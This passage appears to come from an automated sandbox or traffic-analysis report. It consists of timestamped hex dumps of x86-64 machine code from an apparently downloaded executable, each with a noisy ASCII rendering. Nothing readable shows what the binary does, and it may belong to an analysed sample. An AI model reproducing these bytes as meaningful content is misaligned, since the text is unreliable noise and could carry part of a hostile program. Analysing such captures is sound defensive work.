48 8b ac 24 90 00 00 00 c7 01 00 00 00 00 48 89 d1 e8 e8 Data Ascii: HHHHH\$8H\|$0Ll$(HD$ H<LMMkL7L/L'LHHHH5H;H;;H;H@[_^A\A]A^A_AWAVAUATVWUSH(MLHHL$L$L$H$H
2022-03-22 15:50:26 UTC	281	IN	Data Raw: 98 01 00 00 48 83 f8 64 72 76 48 89 f1 e8 80 fc ff ff 8b ae 90 01 00 00 ff c5 89 ae 90 01 00 00 4c 8d 76 08 bf 11 00 00 00 48 8d 5c 24 20 48 8b 0c fe 48 8b 01 48 89 da ff 50 18 48 8b 46 18 4c 8b 40 28 4c 89 f1 48 89 da e8 eb ab fc ff 48 8b 0c fe 48 8b 01 ff 50 08 40 f6 c5 01 75 0b d1 ed 48 ff c7 48 83 ff 31 75 c5 48 8d 4c 24 20 ba 72 00 00 00 e8 d9 34 03 00 48 89 f1 e8 7e fc ff ff 48 8b 8c 24 98 00 00 00 48 31 e1 e8 e1 ce 03 00 90 48 81 c4 a0 00 00 00 5b 5d 5f 5e 41 5e c3 cc cc 56 48 83 ec 20 48 89 ce 48 8b 09 48 8b 56 10 e8 9c 34 03 00 ba 40 00 00 00 48 89 f1 e8 8f 34 03 00 48 89 f1 48 83 c4 20 5e e9 74 b2 fc ff 56 57 53 48 83 ec 20 48 89 d7 48 89 ce 48 c7 41 08 00 00 00 00 4c 8b 41 10 4d 85 c0 74 51 31 c9 49 29 c8 48 03 0e ba 01 00 00 00 49 89 f9 e8 07 Data Ascii: HdrvHLvH\$ HHHPHFL@(LHHHP@uHH1uHL$ r4H~H$H1H[]_^A^VH HHHV4@H4HH ^tVWSH HHHALAMtQ1I)HI
2022-03-22 15:50:26 UTC	289	IN	Data Raw: 0f 84 75 ff ff ff 48 b8 45 6e 63 72 79 70 74 69 48 33 84 24 90 00 00 00 48 b9 72 79 70 74 69 6f 6e 00 48 33 8c 24 93 00 00 00 48 09 c1 0f 85 48 ff ff ff 4c 89 e9 e8 ad f6 ff ff 48 85 c0 0f 84 37 ff ff ff 48 89 c1 e8 b7 93 fc ff 48 8d 94 24 90 00 00 00 4c 89 e9 e8 2f f6 ff ff 84 c0 0f 84 17 ff ff ff 48 b8 43 6f 6d 6d 65 6e 74 00 48 39 84 24 90 00 00 00 0f 85 ff fe ff ff 4c 89 e9 e8 64 f6 ff ff 48 85 c0 0f 84 ee fe ff ff 48 89 c6 48 85 ed 0f 84 c8 04 00 00 48 89 75 00 e9 c7 04 00 00 48 89 7c 24 30 31 f6 31 ed 31 ff e9 92 03 00 00 48 8d 35 28 8d 07 00 45 31 e4 31 db e9 47 02 00 00 48 89 f1 e8 38 93 fc ff 49 8b 55 20 48 8d 74 24 78 48 89 f1 e8 85 91 fc ff 48 89 f1 e8 91 c1 01 00 48 89 c6 48 8d 05 32 8e 07 00 48 89 44 24 30 48 85 f6 74 af 4c 89 7c 24 38 4c 89 Data Ascii: uHEncryptiH3$HryptionH3$HHLH7HH$L/HCommentH9$LdHHHHuH\|$0111H5(E11GH8IU Ht$xHHHH2HD$0HtL\|$8L
2022-03-22 15:50:26 UTC	297	IN	Data Raw: 8d ff ff ff 48 8b 4e 08 48 85 c9 74 0d e8 ba a4 fc ff 48 c7 46 08 00 00 00 00 48 8b 4e 10 48 85 c9 74 0d e8 a4 a4 fc ff 48 c7 46 10 00 00 00 00 48 8b 4e 38 48 85 c9 74 0d e8 85 74 fc ff 48 c7 46 38 00 00 00 00 48 83 c4 20 5e c3 56 57 48 83 ec 68 48 89 cf 48 8b 05 45 d1 08 00 48 31 e0 48 89 44 24 60 48 8b 02 48 8b 4a 08 48 8d 54 24 30 48 89 02 48 89 4a 10 48 c7 42 08 00 00 00 00 c7 42 18 00 00 00 00 48 89 52 20 48 8d 74 24 20 48 89 f1 e8 0e 71 fc ff 48 8d 15 e9 8f 07 00 48 89 f1 e8 db a1 01 00 84 c0 74 63 b9 01 00 00 00 ba 48 00 00 00 45 31 c0 e8 8d 73 fc ff 48 89 c6 48 89 78 40 48 8b 4c 24 50 e8 5e b1 fc ff 48 89 46 10 48 8b 4c 24 50 e8 50 b1 fc ff 48 89 46 08 0f 57 c0 0f 11 46 18 0f 11 46 28 48 c7 46 38 00 00 00 00 48 8b 44 24 50 83 78 18 00 74 14 48 89 Data Ascii: HNHtHFHNHtHFHN8HttHF8H ^VWHhHHEH1HD$`HHJHT$0HHJHBBHR Ht$ HqHHtcHE1sHHx@HL$P^HFHL$PPHFWFF(HF8HD$PxtH
2022-03-22 15:50:26 UTC	305	IN	Data Raw: 01 fc 49 01 f4 48 89 ee 48 c1 c6 24 48 89 ef 48 c1 c7 1e 48 31 f7 48 89 ee 48 c1 c6 19 48 31 fe 48 89 ef 48 21 cf 48 89 eb 48 09 cb 48 21 c3 48 09 fb 48 01 f3 4d 01 e5 4c 89 ee 48 c1 c6 32 49 01 dc 4c 89 ef 48 c1 c7 2e 48 31 f7 4c 89 ee 48 c1 c6 17 48 31 fe 4c 89 c7 4c 31 df 4c 21 ef 4c 31 df 4f 03 4c d6 20 4e 03 8c d4 b0 00 00 00 49 01 f9 4c 89 cf 48 01 f7 4c 89 e2 48 c1 c2 24 4c 89 e3 48 c1 c3 1e 48 31 d3 4c 89 e2 48 c1 c2 19 48 31 da 4c 89 e6 48 21 ee 4d 89 e1 49 09 e9 49 21 c9 49 09 f1 49 01 d1 48 01 f8 48 89 c2 48 c1 c2 32 49 01 f9 48 89 c6 48 c1 c6 2e 48 31 d6 48 89 c2 48 c1 c2 17 48 31 f2 4c 89 ee 4c 31 c6 48 21 c6 4c 31 c6 4f 03 5c d6 28 4e 03 9c d4 b8 00 00 00 49 01 f3 4c 89 de 48 01 d6 4c 89 ca 48 c1 c2 24 4c 89 cb 48 c1 c3 1e 48 31 d3 4c 89 ca Data Ascii: IHH$HHH1HHH1HH!HHH!HHMLH2ILH.H1LHH1LL1L!L1OL NILHLH$LHH1LHH1LH!MII!IIHHH2IHH.H1HHH1LL1H!L1O\(NILHLH$LHH1L
2022-03-22 15:50:26 UTC	313	IN	Data Raw: 58 18 48 89 d9 e8 33 30 fc ff 48 89 d9 ba 02 00 00 00 e8 26 30 fc ff 48 89 d9 4c 89 f2 e8 18 31 fc ff 48 89 d9 4c 89 e2 e8 0d 31 fc ff 8b 46 10 4c 8b 0e 41 8b 17 49 8b 4f 10 48 8b 49 20 48 8b 59 08 4c 89 6c 24 28 89 44 24 20 41 b8 5c 00 00 00 ff 53 48 48 89 f1 e8 51 5d 01 00 49 8b 8f 40 40 00 00 48 89 fa e8 5b 55 01 00 48 89 f9 e8 d0 35 fc ff 49 8b 8f 40 40 00 00 31 d2 e8 5e 4a 01 00 48 89 c7 48 85 c0 0f 85 67 ff ff ff 49 8b 8f 48 40 00 00 31 ff 31 d2 e8 42 4a 01 00 48 85 c0 0f 84 a9 00 00 00 48 89 c3 4c 8d 35 19 c7 06 00 8b 43 10 83 c8 02 83 f8 03 75 1a ff c7 49 8b 8f 48 40 00 00 89 fa e8 14 4a 01 00 48 89 c3 48 85 c0 75 dd eb 7a e8 56 5c 01 00 48 89 c6 8b 53 08 48 8d 48 18 e8 54 2f fc ff 8b 46 10 4c 8b 0e 41 8b 17 49 8b 4f 10 48 8b 49 20 4c 8b 51 08 4c Data Ascii: XH30H&0HL1HL1FLAIOHI HYLl$(D$ A\SHHQ]I@@H[UH5I@@1^JHHgIH@11BJHHL5CuIH@JHHuzV\HSHHT/FLAIOHI LQL
2022-03-22 15:50:26 UTC	320	IN	Data Raw: 47 20 48 89 6f 28 4c 89 f1 e8 38 3a 01 00 48 89 87 80 00 00 00 e8 d6 3d 01 00 48 89 87 88 00 00 00 b0 01 45 84 ed 75 14 48 8d 15 97 67 07 00 4c 89 f9 e8 91 0c 00 00 85 c0 0f 99 c0 88 47 30 48 8d 05 5b fd 05 00 48 89 87 b0 00 00 00 48 89 d9 e8 c9 f4 fe ff 48 89 d8 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 48 8b 41 d8 48 8b 00 c3 8b 41 88 c3 56 57 48 83 ec 28 48 89 ce 48 8d b9 50 ff ff ff 48 8b 89 58 ff ff ff e8 06 25 fb ff 48 8b 4e d0 e8 69 16 fc ff 48 8b 4e d8 e8 ca 3d 01 00 48 8b 4e e0 e8 57 16 fc ff 48 8b 4e f0 e8 4e 16 fc ff 48 8b 8e 70 ff ff ff e8 42 16 fc ff 48 89 f9 48 83 c4 28 5f 5e e9 34 16 fc ff 41 57 41 56 41 54 56 57 53 48 83 ec 38 49 89 ce 48 8b 05 fb 72 08 00 48 31 e0 48 89 44 24 30 4c 8d b9 50 ff ff ff 8b 81 50 ff ff ff 3d 02 01 00 Data Ascii: G Ho(L8:H=HEuHgLG0H[HHHH([]_^A\A]A^A_HAHAVWH(HHPHX%HNiHN=HNWHNNHpBHH(_^4AWAVATVWSH8IHrH1HD$0LPP=
2022-03-22 15:50:26 UTC	328	IN	Data Raw: 90 04 48 63 47 f0 89 c1 44 29 f1 81 e1 ff 7f 00 00 8a 94 0f f0 7f ff ff 88 94 07 f0 7f ff ff 8b 47 f0 ff c0 25 ff 7f 00 00 89 47 f0 48 8b 4f f8 48 83 c1 18 e8 0f f1 fb ff 83 af 88 7e ff ff 01 73 c0 4c 8d 0d 04 03 00 00 e9 33 fb ff ff 83 f8 10 0f 8c 96 02 00 00 8b 8f e8 7f ff ff 0f b7 d1 89 97 90 7e ff ff 83 c0 f0 89 87 ec 7f ff ff c1 e9 10 89 8f e8 7f ff ff c7 87 68 7e ff ff 0b 00 00 00 e9 fa fa ff ff 83 f8 10 0f 8c 5d 02 00 00 8b 8f 90 7e ff ff 8b 97 e8 7f ff ff 89 d6 f7 d6 83 c0 f0 89 87 ec 7f ff ff c1 ea 10 89 97 e8 7f ff ff 0f b7 c6 39 c1 0f 85 72 02 00 00 85 c9 74 64 c7 87 68 7e ff ff 0c 00 00 00 e9 b1 fa ff ff 83 f8 08 0f 8c 14 02 00 00 8a 97 e8 7f ff ff 48 63 47 f0 88 94 07 f0 7f ff ff 8b 47 f0 ff c0 25 ff 7f 00 00 89 47 f0 48 8b 4f f8 48 83 c1 18 Data Ascii: HcGD)G%GHOH~sL3~h~]~9rtdh~HcGG%GHOH
2022-03-22 15:50:26 UTC	336	IN	Data Raw: 00 e9 61 01 00 00 4c 89 e9 ba fc 00 00 00 e9 4c 01 00 00 40 80 fd f0 0f 85 68 01 00 00 41 8b 4d 6c 83 f9 23 0f 8f ab 01 00 00 83 f9 18 0f 84 91 02 00 00 83 f9 20 0f 85 23 06 00 00 49 8b 46 e0 48 83 78 10 01 0f 85 4f 03 00 00 48 8b 40 08 80 38 01 0f 85 42 03 00 00 49 8b 4e f0 ba 35 00 00 00 e8 8a ea fa ff 48 89 c7 48 89 c1 e8 80 f6 03 00 48 8d 48 14 ba 01 00 00 00 45 31 c0 e8 87 d7 fb ff 48 89 c5 c7 00 ff fa 20 00 48 8d 48 04 48 89 fa e8 ca ec 03 00 48 89 f9 e8 52 f6 03 00 48 c1 e0 20 48 b9 00 00 00 00 04 00 00 00 48 01 c1 48 c1 f9 20 c6 44 0d 00 ff 48 b9 00 00 00 00 05 00 00 00 48 01 c1 48 c1 f9 20 c6 44 0d 00 f0 48 b9 00 00 00 00 06 00 00 00 4c 8d 04 08 49 c1 f8 20 49 8b 8e 70 ff ff ff 48 8b 01 48 89 ea ff 50 10 49 89 46 d0 49 8b 4e 88 48 8d 15 e9 07 07 Data Ascii: aLL@hAMl# #IFHxOH@8BIN5HHHHE1H HHHHRH HHH DHHH DHLI IpHHPIFINH
2022-03-22 15:50:26 UTC	344	IN	Data Raw: 00 00 8b 5c 24 60 eb 10 48 8b b4 24 a0 00 00 00 48 8b ac 24 90 00 00 00 45 84 ed 0f 85 bb 00 00 00 49 8b 46 28 48 8b 7c 24 68 48 8b 0c f8 89 ea 4c 8b 44 24 78 e8 de 97 00 00 49 8b 46 28 48 8b 04 f8 48 8b 40 18 48 8b 94 24 e0 00 00 00 48 8b 8c 24 80 00 00 00 89 0c 10 49 8b 46 28 48 8b 04 f8 48 8b 40 18 89 5c 10 04 49 8b 46 28 48 8b 04 f8 48 8b 40 18 8a 4c 24 58 88 4c 10 08 8a 4c 24 53 88 4c 10 09 8a 4c 24 52 88 4c 10 0a 8a 4c 24 51 88 4c 10 0b 8a 4c 24 50 88 4c 10 0c 8a 4c 24 4f 88 4c 10 0d 8a 4c 24 4e 88 4c 10 0e 8a 4c 24 4d 88 4c 10 0f 39 6c 24 74 75 21 49 8b 46 28 48 8b 4c 24 68 48 8b 04 c8 48 8b 40 18 48 8b 8c 24 88 00 00 00 81 4c 88 04 00 00 00 80 0f ba e3 16 4c 8b ac 24 a8 00 00 00 0f 83 93 00 00 00 ff c5 41 3b ae 78 01 00 00 0f 8d 84 00 00 00 48 83 Data Ascii: \$`H$H$EIF(H\|$hHLD$xIF(HH@H$H$IF(HH@\IF(HH@L$XLL$SLL$RLL$QLL$PLL$OLL$NLL$ML9l$tu!IF(HL$hHH@H$LL$A;xH
2022-03-22 15:50:26 UTC	352	IN	Data Raw: a6 00 00 48 89 c7 48 89 f1 44 89 e2 41 b0 01 e8 b7 03 00 00 48 89 f9 48 89 c2 41 89 d8 e8 6a ae 00 00 ff c3 41 39 de 75 dd 48 8b 4e 18 48 85 c9 74 3c 31 d2 e8 e4 b1 00 00 48 85 c0 74 27 48 89 c3 48 8b 4b 18 e8 b9 99 fb ff 48 89 d9 e8 b1 99 fb ff 48 8b 4e 18 31 d2 e8 c0 b1 00 00 48 89 c3 48 85 c0 75 dc 48 8b 4e 18 e8 b6 a6 00 00 48 89 7e 18 31 ff 89 be d0 01 00 00 48 8b 8e 68 0e 00 00 41 b8 01 00 00 00 48 89 ea e8 33 99 fb ff 48 89 86 68 0e 00 00 8b 8e 78 01 00 00 85 c9 0f 48 cf 44 39 e1 7d 27 89 c9 f6 c1 07 0f 94 04 08 48 ff c1 48 39 e9 74 16 48 8b 86 68 0e 00 00 f6 c1 07 0f 94 04 08 48 ff c1 48 39 cd 75 ea 8b 86 d0 00 00 00 85 c0 8b 54 24 34 78 08 44 89 ff 44 39 f0 7c 06 89 be d0 00 00 00 44 39 a6 d4 00 00 00 7c 0b 41 8d 44 24 ff 89 86 d4 00 00 00 8b 8e Data Ascii: HHDAHHAjA9uHNHt<1Ht'HHKHHN1HHuHNH~1HhAH3HhxHD9}'HH9tHhHH9uT$4xDD9\|D9\|AD$
2022-03-22 15:50:26 UTC	359	IN	Data Raw: 0e 00 00 8b ae 8c 0e 00 00 8d 1c 2a ff cd 39 d9 0f 4d ea 89 ae 94 0e 00 00 43 8d 54 2d 00 8b 8e 88 0e 00 00 8d 2c 01 39 ea 0f 8d fb 00 00 00 89 8e 90 0e 00 00 e9 09 01 00 00 83 f9 02 0f 82 00 01 00 00 44 89 ae 90 0e 00 00 89 be 94 0e 00 00 e9 ee 00 00 00 81 ff de 00 00 00 0f 8f eb 01 00 00 81 fd de 00 00 00 0f 8f df 01 00 00 83 c5 21 83 c7 21 41 83 c0 20 89 6c 24 20 48 8d 15 9c 94 06 00 48 8d 4c 24 50 41 89 f9 e9 ba fe ff ff 83 fd 06 0f 85 9a 01 00 00 41 ff ce 41 83 fe 02 0f 87 8d 01 00 00 8b 96 d8 11 00 00 48 89 f1 e8 e5 f4 ff ff e9 7a 01 00 00 44 8b 86 78 01 00 00 4c 8b 8e 80 0e 00 00 4c 89 ca 48 c1 ea 20 44 89 e9 44 29 c9 45 8d 50 01 41 0f af ca 89 f8 29 d0 01 c8 4c 8b 9e 88 0e 00 00 4c 89 d9 48 c1 e9 20 44 89 db 44 29 cb 41 0f af da 89 cd 29 d5 01 dd Data Ascii: *9MCT-,9D!!A l$ HHL$PAAAHzDxLLH DD)EPA)LLH DD)A)
2022-03-22 15:50:26 UTC	367	IN	Data Raw: c1 e9 20 4c 89 fa 48 c1 ea 20 31 ed 39 ca 40 0f 9c c5 31 c9 41 39 c7 0f 9c c1 0f 45 e9 40 80 fd 01 75 44 48 8b 86 c8 00 00 00 48 8b ae 80 0e 00 00 48 89 c2 48 c1 ea 20 48 89 e9 48 c1 e9 20 31 db 39 d1 0f 9c c3 31 c9 39 c5 0f 9c c1 0f 45 d9 80 fb 01 75 12 c7 86 74 0e 00 00 00 00 00 00 48 8b 44 24 48 0f 11 30 c6 86 8e 01 00 00 01 80 be e9 10 00 00 00 4c 8b 7c 24 58 48 8b 6c 24 28 0f 85 d5 12 00 00 e9 ba 12 00 00 f6 06 01 0f 84 24 02 00 00 c7 86 70 0e 00 00 01 00 00 00 c7 86 58 02 00 00 00 00 00 00 e9 ae 12 00 00 f6 06 02 0f 84 6f 02 00 00 8b 86 74 01 00 00 85 c0 0f 8e a4 00 00 00 31 ed 4c 89 7c 24 58 4c 89 b4 24 80 00 00 00 48 89 f1 89 ea 41 b8 b8 0f 00 00 41 b9 01 00 00 00 e8 b7 b6 ff ff 48 89 c3 44 8b 86 78 01 00 00 44 3b 40 04 74 12 48 89 f1 48 89 da e8 Data Ascii: LH 19@1A9E@uDHHHH HH 1919EutHD$H0L\|$XHl$($pXot1L\|$XL$HAAHDxD;@tHH
2022-03-22 15:50:26 UTC	375	IN	Data Raw: 45 31 c9 e8 c9 10 fb ff 48 8b 8e b8 10 00 00 48 89 ea 41 89 f8 45 31 c9 e8 b4 10 fb ff 48 8b 8e b8 10 00 00 48 8d 15 6c 58 06 00 41 b8 02 00 00 00 45 31 c9 e8 98 10 fb ff 48 8b 6c 24 28 e9 d7 f3 ff ff 48 89 f1 e8 fe 2b 00 00 80 be 85 11 00 00 00 74 11 48 8b 8e c8 10 00 00 48 85 c9 74 05 e8 64 19 fb ff 48 8b 8c 24 38 02 00 00 48 31 e1 e8 fc 57 02 00 0f 28 b4 24 40 02 00 00 48 81 c4 58 02 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 c8 d0 ff ff 89 f3 ff ff ef da ff ff 38 db ff ff 60 db ff ff ec db ff ff e3 db ff ff d9 db ff ff 1e dc ff ff 94 dc ff ff ac dc ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff 89 f3 ff ff c4 dc ff ff df d0 ff ff 0a d5 ff ff fc d0 ff ff 80 d1 ff ff df d1 Data Ascii: E1HHAE1HHlXAE1Hl$(H+tHHtdH$8H1W($@HX[]_^A\A]A^A_8`
2022-03-22 15:50:26 UTC	383	IN	Data Raw: 02 00 90 48 83 c4 40 5b 5d 5f 5e 41 5c 41 5e 41 5f c3 56 48 83 ec 20 80 b9 e9 10 00 00 00 74 35 48 89 ce 80 b9 ea 10 00 00 00 75 29 48 89 f1 e8 e9 53 ff ff c6 86 ea 10 00 00 01 48 8d 15 19 00 00 00 b9 14 00 00 00 49 89 f0 e8 76 27 00 00 89 86 ec 10 00 00 48 83 c4 20 5e c3 56 57 48 83 ec 28 89 d7 48 89 ce 80 b9 f0 10 00 00 00 74 25 39 be f4 10 00 00 75 1d 80 b6 fc 00 00 00 01 c6 86 f0 10 00 00 00 48 89 f1 e8 a2 76 ff ff c6 86 e9 10 00 00 01 80 be f1 10 00 00 00 74 25 39 be f8 10 00 00 75 1d 80 b6 fb 00 00 00 01 c6 86 f1 10 00 00 00 48 89 f1 e8 c5 76 ff ff c6 86 e9 10 00 00 01 80 be 81 01 00 00 00 74 16 39 be 84 01 00 00 75 0e c6 86 81 01 00 00 00 c6 86 e9 10 00 00 01 80 be ea 10 00 00 00 74 0f 39 be ec 10 00 00 75 07 c6 86 ea 10 00 00 00 80 be e9 10 00 00 Data Ascii: H@[]_^A\A^A_VH t5Hu)HSHIv'H ^VWH(Ht%9uHvt%9uHvt9ut9u
2022-03-22 15:50:26 UTC	391	IN	Data Raw: 00 00 00 45 89 e7 45 29 cf 44 39 fe 41 0f 4f f7 42 8d 2c 0e 48 8b 99 c8 00 00 00 4c 8b 91 88 0e 00 00 4c 89 d1 48 c1 e9 20 48 89 da 48 c1 ea 20 31 c0 39 ca 0f 9c c0 31 d2 44 39 d3 0f 9c c2 0f 45 c2 3c 01 0f 85 49 01 00 00 49 8b 96 80 0e 00 00 49 89 d0 49 c1 e8 20 31 c0 45 39 c4 0f 9f c0 31 ff 39 d3 40 0f 9f c7 0f 45 c7 3c 01 0f 85 20 01 00 00 45 85 ed 44 89 c8 0f 48 c5 31 ff 44 39 c0 40 0f 9e c7 31 c0 39 d3 0f 9c c0 0f 44 c7 3c 01 0f 85 e6 00 00 00 31 c0 45 85 ed 0f 49 c6 44 89 e2 29 c2 31 c0 39 ca 0f 9d c0 31 d2 44 39 d3 0f 9f c2 0f 44 d0 80 fa 01 0f 85 be 00 00 00 89 f0 f7 d8 45 85 ed 0f 49 c6 41 01 c0 45 89 86 84 0e 00 00 01 c8 41 89 86 8c 0e 00 00 44 89 e1 45 39 c8 7d 27 48 8d 0d 8a 83 06 00 48 8d 15 73 99 06 00 41 b8 6c 0b 00 00 e8 5c d8 02 00 45 8b Data Ascii: EE)D9AOB,HLLH HH 191D9E<IIII 1E919@E< EDH1D9@19D<1EID)191D9DEIAEADE9}'HHsAl\E
2022-03-22 15:50:26 UTC	398	IN	Data Raw: 0b ff cb eb 02 ff c3 48 ff c6 eb e0 85 db 74 05 80 fa 3a 74 f2 4c 89 f1 e8 04 12 02 00 48 85 c0 0f 94 c0 48 0f 45 fe 40 08 e8 3c 01 74 d9 48 89 f7 48 89 f8 48 83 c4 20 5b 5d 5f 5e 41 5e c3 56 48 83 ec 30 48 8b 05 16 3b 07 00 48 31 e0 48 89 44 24 28 48 8d 44 24 26 88 10 c6 40 01 00 48 89 c2 41 b0 01 e8 68 ff ff ff 48 89 c6 48 8b 4c 24 28 48 31 e1 e8 38 fa 01 00 48 89 f0 48 83 c4 30 5e c3 56 48 83 ec 30 48 8b 05 d3 3a 07 00 48 31 e0 48 89 44 24 28 48 8d 44 24 26 88 10 c6 40 01 00 48 89 c2 45 31 c0 e8 25 ff ff ff 48 89 c6 48 8b 4c 24 28 48 31 e1 e8 f5 f9 01 00 48 89 f0 48 83 c4 30 5e c3 41 56 56 57 55 53 48 83 ec 20 48 89 cf 80 39 5b 75 7b 4c 8d 77 01 31 f6 4c 89 f3 0f b6 2b 85 ed 74 3a 40 80 fd 5d 74 34 89 e9 e8 55 ea 02 00 85 c0 75 08 40 80 fd 3a 75 07 ff Data Ascii: Ht:tLHHE@<tHHH []_^A^VH0H;H1HD$(HD$&@HAhHHL$(H18HH0^VH0H:H1HD$(HD$&@HE1%HHL$(H1HH0^AVVWUSH H9[u{Lw1L+t:@]t4Uu@:u
2022-03-22 15:50:26 UTC	406	IN	Data Raw: 48 8d 15 c2 6a 05 00 48 89 f9 41 b0 73 49 89 c1 e8 73 70 fa ff 8b 8c 24 f0 00 00 00 e8 57 79 fb ff 48 85 c0 74 14 45 84 ed 74 0f 8b 80 a0 00 00 00 83 e0 01 0f 85 ec 00 00 00 48 8d 15 18 54 05 00 4c 8d 05 27 b0 05 00 4c 8d 0d e4 53 05 00 4c 89 e1 e8 5b 67 fa ff 49 89 c6 b9 01 00 00 00 e8 b5 63 fa ff 49 89 c7 b9 03 00 00 00 e8 a8 63 fa ff 48 89 c3 b9 02 00 00 00 e8 9b 63 fa ff 48 89 c5 31 c9 e8 91 63 fa ff 48 89 c7 b9 77 00 00 00 e8 84 63 fa ff 48 89 c6 48 8d 0d 1f a1 05 00 e8 78 63 fa ff 4c 89 7c 24 70 4c 8d 3d 46 e0 f9 ff 48 8d 0d 0e 4e 05 00 48 89 4c 24 68 48 89 5c 24 60 48 8d 0d d0 cd 05 00 48 89 4c 24 58 48 89 6c 24 50 48 8d 0d a6 5a 05 00 48 89 4c 24 48 48 89 7c 24 40 48 8d 0d 38 6e 05 00 48 89 4c 24 38 48 89 74 24 30 48 8d 0d 5a de f9 ff 48 89 4c 24 Data Ascii: HjHAsIsp$WyHtEtHTL'LSL[gIcIcHcH1cHwcHHxcL\|$pL=FHNHL$hH\$`HHL$XHl$PHZHL$HH\|$@H8nHL$8Ht$0HZHL$
2022-03-22 15:50:26 UTC	414	IN	Data Raw: ff ff 48 39 f0 74 1f 48 8d 0d b9 41 06 00 48 8d 15 86 3a 06 00 41 b8 16 05 00 00 48 83 c4 28 5f 5e e9 73 7b 02 00 90 48 83 c4 28 5f 5e c3 45 31 c0 48 39 0a 41 0f 92 c0 b8 ff ff ff ff 41 0f 46 c0 c3 44 8b 01 8b 4a 08 b8 ff ff ff ff 41 39 c8 7c 0b 03 4a 0c 31 c0 41 39 c8 0f 9d c0 c3 48 8b 49 08 e9 38 b4 ff ff cc cc 41 57 41 56 41 55 41 54 56 57 55 53 48 81 ec 98 07 00 00 0f 29 b4 24 80 07 00 00 4d 89 cf 4c 89 c3 49 89 d4 48 89 8c 24 88 00 00 00 48 8b bc 24 00 08 00 00 48 8b 05 3d fc 06 00 48 31 e0 48 89 84 24 78 07 00 00 44 8b 2f 49 8b 41 08 48 85 c0 0f 84 81 00 00 00 80 38 00 0f 84 1c 01 00 00 31 f6 b9 01 00 00 00 ba 30 00 00 00 45 31 c0 e8 ad 9e fa ff 48 89 30 44 89 68 10 44 89 68 08 c7 40 0c 01 00 00 00 48 89 70 28 0f 57 c0 0f 11 40 14 4c 89 e1 48 89 c2 Data Ascii: H9tHAH:AH(_^s{H(_^E1H9AAFDJA9\|J1A9HI8AWAVAUATVWUSH)$MLIH$H$H=H1H$xD/IAH810E1H0DhDh@Hp(W@LH
2022-03-22 15:50:26 UTC	422	IN	Data Raw: c3 48 85 c0 74 08 48 8b 03 83 38 02 74 1c 48 8d 0d d0 29 06 00 48 8d 15 3f 1b 06 00 41 b8 59 08 00 00 e8 32 5c 02 00 48 8b 03 44 8b 43 08 41 8d 50 01 45 8d 0c 38 41 ff c1 44 03 40 40 48 8b 0e 48 83 c4 20 5b 5f 5e 48 ff 25 7b 8b 06 00 41 56 56 57 53 48 83 ec 28 48 89 d6 48 89 ca 48 89 f1 e8 21 ff ff ff 48 89 c7 48 85 c0 74 08 48 8b 07 83 38 02 74 1c 48 8d 0d 69 29 06 00 48 8d 15 d8 1a 06 00 41 b8 64 08 00 00 e8 cb 5b 02 00 48 8b 07 83 78 40 00 7e 25 31 db 4c 8b 35 01 8d 06 00 8b 47 08 8d 14 03 ff c2 48 8b 0e 41 ff d6 85 c0 75 28 ff c3 48 8b 07 3b 58 40 7c e4 48 8d 0d 54 4a 06 00 48 8d 15 91 1a 06 00 41 b8 68 08 00 00 e8 84 5b 02 00 e8 ef 05 fb ff 89 d8 48 83 c4 28 5b 5f 5e 41 5e c3 56 57 53 48 83 ec 20 44 89 c3 48 89 d6 48 89 ca 48 89 f1 e8 88 fe ff ff 48 Data Ascii: HtH8tH)H?AY2\HDCAPE8AD@@HH [_^H%{AVVWSH(HHH!HHtH8tHi)HAd[Hx@~%1L5GHAu(H;X@\|HTJHAh[H([_^A^VWSH DHHHH
2022-03-22 15:50:26 UTC	430	IN	Data Raw: 8b 44 24 38 85 c0 0f 8e 97 00 00 00 8b 0d 7f cf 06 00 89 4c 24 2c 8b 0d 85 d3 06 00 89 4c 24 28 8b 0d 8b d7 06 00 48 89 4c 24 40 41 89 c7 31 ed 48 8b 7c 24 30 41 8b 04 ac 89 c1 48 8d 15 5f cf 06 00 2b 4c 24 2c 7c 22 3b 4c 24 28 7d 24 48 8b 54 24 40 89 d0 01 c8 8d 4c 0a 7f 0f 49 c8 83 e1 80 29 c8 48 8d 15 47 d3 06 00 48 98 4c 8b 34 c2 eb 03 45 31 f6 4c 89 f1 e8 74 7f 02 00 48 63 d8 48 89 f9 4c 89 f2 49 89 d8 e8 83 8e 01 00 48 01 df 48 83 c7 02 66 c7 47 fe 0d 0a 48 ff c5 49 39 ef 75 92 b9 02 00 00 00 48 8b 7c 24 30 48 89 fa 45 89 e8 41 b1 01 e8 03 63 00 00 48 89 f9 e8 c0 60 fa ff 4c 89 e1 e8 b8 60 fa ff 8b 05 d0 d2 06 00 03 05 ba ce 06 00 0f 8e f3 fd ff ff 45 31 f6 48 8b 3d 52 6e 06 00 31 db 48 89 5c 24 20 48 89 f1 ba e9 03 00 00 41 b8 85 01 00 00 45 31 c9 Data Ascii: D$8L$,L$(HL$@A1H\|$0AH_+L$,\|";L$(}$HT$@LI)HGHL4E1LtHcHLIHHfGHI9uH\|$0HEAcH`L`E1H=Rn1H\$ HAE1
2022-03-22 15:50:26 UTC	438	IN	Data Raw: 0c 81 3d 6a cc 06 00 00 02 00 00 74 1f b1 01 e8 5c 45 00 00 4c 89 35 66 cc 06 00 4c 89 25 67 cc 06 00 c7 05 49 cc 06 00 00 02 00 00 b9 05 00 00 00 44 89 e2 e8 3d f0 00 00 41 f6 c6 13 0f 84 34 31 00 00 ff 15 d8 4d 06 00 4c 39 e8 0f 85 25 31 00 00 31 c0 41 f6 c6 10 0f 94 c0 83 c8 02 41 f6 c6 01 be 01 00 00 00 0f 44 f0 e8 21 8c 00 00 41 89 c7 44 89 f7 83 e7 08 c1 ef 03 41 83 e6 04 41 c1 ee 02 44 89 e1 c1 f9 10 8b 2d 66 c3 06 00 89 c8 29 e8 ff c0 45 85 e4 0f 49 c1 2b 05 90 c3 06 00 99 f7 fd 89 c3 44 89 e1 c1 e1 10 41 0f bf d4 8b 2d 3b c3 06 00 89 d0 29 e8 ff c0 85 c9 0f 49 c2 2b 05 6e c3 06 00 99 f7 fd 89 c5 89 f1 e8 1d 8c 00 00 48 8b 0d 47 c3 06 00 44 88 7c 24 40 40 88 7c 24 38 44 88 74 24 30 89 5c 24 28 89 6c 24 20 89 f2 